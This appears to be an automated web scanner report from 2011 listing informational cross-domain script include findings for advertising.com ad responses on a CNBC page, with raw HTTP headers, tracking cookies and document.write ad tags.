Set-Cookie: BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: 83985251=_4dfa4d78,7117460224,768033^951514^1183^0,0_; domain=advertising.com; path=/click

document.write('<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/14302-119028-28901-0?mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000981602/cstr=90208788=_4dfa462f,2878613427,768033^981602^1183^0,1_/xsxdata=$xsxdata/bnum=90208788/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5865.126262.AOLPERFORMANCENETWO/B5551575.40;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001029730/cstr=90827809=_4dfa4b0b,8104060413,768033^1029730^1183^0,1_/xsxdata=$xsxdata/bnum=90827809/optn=64?trg=;ord=8104060413?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029730.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:27:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 609
Date: Thu, 16 Jun 2011 18:27:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/GsDiAzPaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nW5shGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9aooALZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: 90827809=_4dfa4b0b,8104060413,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5865.126262.AOLPERFORMANCENETWO/B5551575.40;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001029730/cstr=90827809=_4dfa4b0b,8104060413,768033^1029730^1183^0,1_/xsxdata=$xsxdata/bnum=90827809/optn=64?trg=;ord=8104060413?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000956559/cstr=9352727=_4dfa3db2,2540351573,768033^956559^1183^0,1_/xsxdata=$xsxdata/bnum=9352727/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000956561/cstr=12937368=_4dfa3db2,0386523300,768034^956561^1183^0,1_/xsxdata=$xsxdata/bnum=12937368/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 17:30:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 17:30:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=y2j+NFJwHob0Fz6sIWwJoa8jtKPCC0nBhJpwEg02FkMBdbdBJTwihXQyEwjmGkMBxGeBJTAQvaQyEQW4FkMBLppBJTQghXQyEgN5FkMB6ijBJTAmhXQyEAY4FkMBdDmBJTA/yaQyEAVZGkMBYimBJTA3WaQyEQY4FkMBFGeBJTAxBaQyEU1aGkMBbTeBJTQwBaQyEYnXGkMBWGoBJTgQvaQyEogmGkMBxmpBJTQRgaQyE0soGkMB8mpBJHZAmZOiGwZj0jw+NXActiGA8Mohn7a+AcsmGeuAEOpREbLuBoKuGy/smJwokaExzClALRqREXaxAMdPGfwrQQwdIaMi; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: F1=BIbP63EBAAAABAAAAYAAcCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHZGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: ROLL=U6APDjemptEW07O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: 12937368=_4dfa3db2,0386523300,768034^956561^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000956561/cstr=12937368=_4dfa3db2,0386523300,768034^956561^1183^0,1_/xsxdata=$xsxdata/bnum=12937368/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=16141575=_4dfa4c42,7722412680,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=16141575/optn=64?trg=;ord=7722412680?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:32:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:32:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkeCsdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3DH4tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: 16141575=_4dfa4c42,7722412680,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=16141575=_4dfa4c42,7722412680,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=16141575/optn=64?trg=;ord=7722412680?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000924217/cstr=1625138=_4dfa43bf,0557655566,768034^924217^1183^0,1_/xsxdata=$xsxdata/bnum=1625138/optn=64?trg=;ord=0557655566?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924217.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 17:56:15 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 604
Date: Thu, 16 Jun 2011 17:56:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=/Ok+NFJwHob0Fu6sIWwJoaojtKPCC0nxfJpwEg02FfMBdbdxHTwihX8xEwjmGfMBxGexHTAQva8xEQW4FfMBLppxHTQghX8xEgN5FfMB6ijxHTAmhX8xEAY4FfMBdDmxHTA/ya8xEAVZGfMBYimxHTA3Wa8xEQY4FfMBFGexHTAxBa8xEU1aGfMBbTexHTQwBa8xEYnXGfMBWGoxHTgQva8xEogmGfMBxmpxHTQRga8xE0soGfMB8mpxHHZAmZOiGrZj0jw+NXsbtiGA8MoRm7a+AcsmGZuAEOpBDbLuBoKuGt/smJwokawwzClALRqBDXaxAMdPGawrQQwdIa4h; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: F1=B87Q63EBAAAABAAAAgAASCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: BASE=x7Q9Si23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1A!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: ROLL=U6APBjemptEW07uaB4l2FnxkoJDmaLF!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: 1625138=_4dfa43bf,0557655566,768034^924217^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000924217/cstr=1625138=_4dfa43bf,0557655566,768034^924217^1183^0,1_/xsxdata=$xsxdata/bnum=1625138/optn=64?trg=;ord=0557655566?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ebay.adnxs.com/ttj?id=472678&cb=2306156771&pt1=0000768034&pt2=0001004441&pt3=1183&imp_id=v2:I:1308248221:2306156771:0000768034:0001004441:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001004441/cstr=27582677=_4dfa489d,2306156771,768034^1004441^1183^0,1_/xsxdata=$XSXDATA/bnum=27582677/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004441.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:17:01 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 641
Date: Thu, 16 Jun 2011 18:17:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4voCFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2euWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: 27582677=_4dfa489d,2306156771,768034^1004441^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript1.1" src="http://ebay.adnxs.com/ttj?id=472678&cb=2306156771&pt1=0000768034&pt2=0001004441&pt3=1183&imp_id=v2:I:1308248221:2306156771:0000768034:0001004441:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001004441/cstr=27582677=_4dfa489d,2306156771,768034^1004441^1183^0,1_/xsxdata=$XSXDATA/bnum=27582677/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=28183863=_4dfa4d77,0408212157,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=28183863/optn=64?trg=;ord=0408212157?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:37:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:37:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=31k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: F1=BcXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksL+9CJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2iG6ypOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: 28183863=_4dfa4d77,0408212157,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=28183863=_4dfa4d77,0408212157,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=28183863/optn=64?trg=;ord=0408212157?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001008685/cstr=3488355=_4dfa5250,1828847536,768034^1008685^1183^0,1_/xsxdata=$xsxdata/bnum=3488355/optn=64?trg=;ord=1828847536?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1008685.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:58:24 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 594
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:58:24 GMT
Connection: close
Set-Cookie: C2=QJl+NFJwHob0Fi6sIWwJoa4itKPCC0nxcJpwEg02FTMBdbdxETwihXMxEwjmGTMBxGexETAQvaMxEQW4FTMBLppxETQghXMxEgN5FTMB6ijxETAmhXMxEAY4FTMBdDmxETA/yaMxEAVZGTMBYimxETA3WaMxEQY4FTMBFGexETAxBaMxEU1aGTMBbTexETQwBaMxEYnXGTMBWGoxETgQvaMxEogmGTMBxmpxETQRgaMxE0soGTMB8mpxEHZAmZOiGfZj0jw+NXYbtiGA8MoRj7a+AcsmGNuAEOpBAbLuBoKuGh/smJwokaAwzClALRqBAXaxAMdPGOwrQQwdIaIhq62ApVmRuTqHIUbNG5WtrCQIza0IwOICM/ohvdr0IwKvG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: F1=BAlU63EBAAAABAAAAcBA6BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: BASE=x7Q9gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: ROLL=U6APQjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCD!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: 3488355=_4dfa5250,1828847536,768034^1008685^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001008685/cstr=3488355=_4dfa5250,1828847536,768034^1008685^1183^0,1_/xsxdata=$xsxdata/bnum=3488355/optn=64?trg=;ord=1828847536?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=42950117=_4dfa4fe4,2035415743,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=42950117/optn=64?trg=;ord=2035415743?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:48:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:48:04 GMT
Connection: close
Vary: Accept-Encoding
